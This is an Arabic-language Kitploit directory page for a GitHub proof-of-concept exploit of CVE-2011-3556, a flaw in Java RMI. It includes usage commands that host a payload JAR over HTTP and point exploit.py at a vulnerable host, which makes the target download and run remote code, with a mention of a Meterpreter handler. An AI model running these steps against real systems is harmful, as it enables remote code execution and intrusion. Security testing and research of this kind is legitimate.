Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve_2011_3556 — تطبيق Python 3 لإثبات المفهوم (PoC) الحالي لـ CVE-2011-3556. | Kitploit
أدوات/GitHubGitHub/sk4la/cve_2011_3556
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsk4la/cve_2011_3556

cve_2011_3556

تطبيق Python 3 لإثبات المفهوم (PoC) الحالي لـ CVE-2011-3556.

عرض المستودع
1منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2011-3556 — إثبات المفهوم (PoC)

إخلاء مسؤولية

هذه الأداة هي تطبيق بلغة بايثون 3 لإثبات المفهوم (PoC) الحالي المُعد بواسطة mihi لإطار Metasploit Framework.

المتطلبات الأساسية

لاستخدام الوحدة، اتبع التعليمات أدناه ببساطة:

root@kitploit:~
# Clone هذا المستودع محليًا.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# اختيارياً، قم بتعيين بت التنفيذ `x` لتتمكن من تشغيل النص البرمجي مباشرة.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

الاستخدام

سطر الأوامر

لكي يتم تحميل الحمولة (ملف JAR ثنائي) عن بُعد بواسطة خادم Java RMI الضعيف، يجب تقديمها كمورد HTTP. يمكن تقديمها بسرعة باستخدام الأمر الشهير python3 -m http.server.

بمجرد أن تصبح الحمولة متاحة للتحميل، قم ببساطة بتشغيل النص البرمجي exploit.py لتفعيل الثغرة.

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

في حال كانت الحمولة هي Meterpreter (في إطار Metasploit Framework)، لا تنسَ استخدام use exploit/multi/handler.

كمكتبة

يمكن استخدام هذه الوحدة أيضًا كمكتبة عن طريق استيراد وحدة cve_2011_3556 إلى نطاق التسمية الحالي:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

الأمر بسيط بهذا الشكل!

الشكر

شكر خاص لـ mihi على التنفيذ الأولي لوحدة إطار Metasploit Framework.

تنزيل الأداة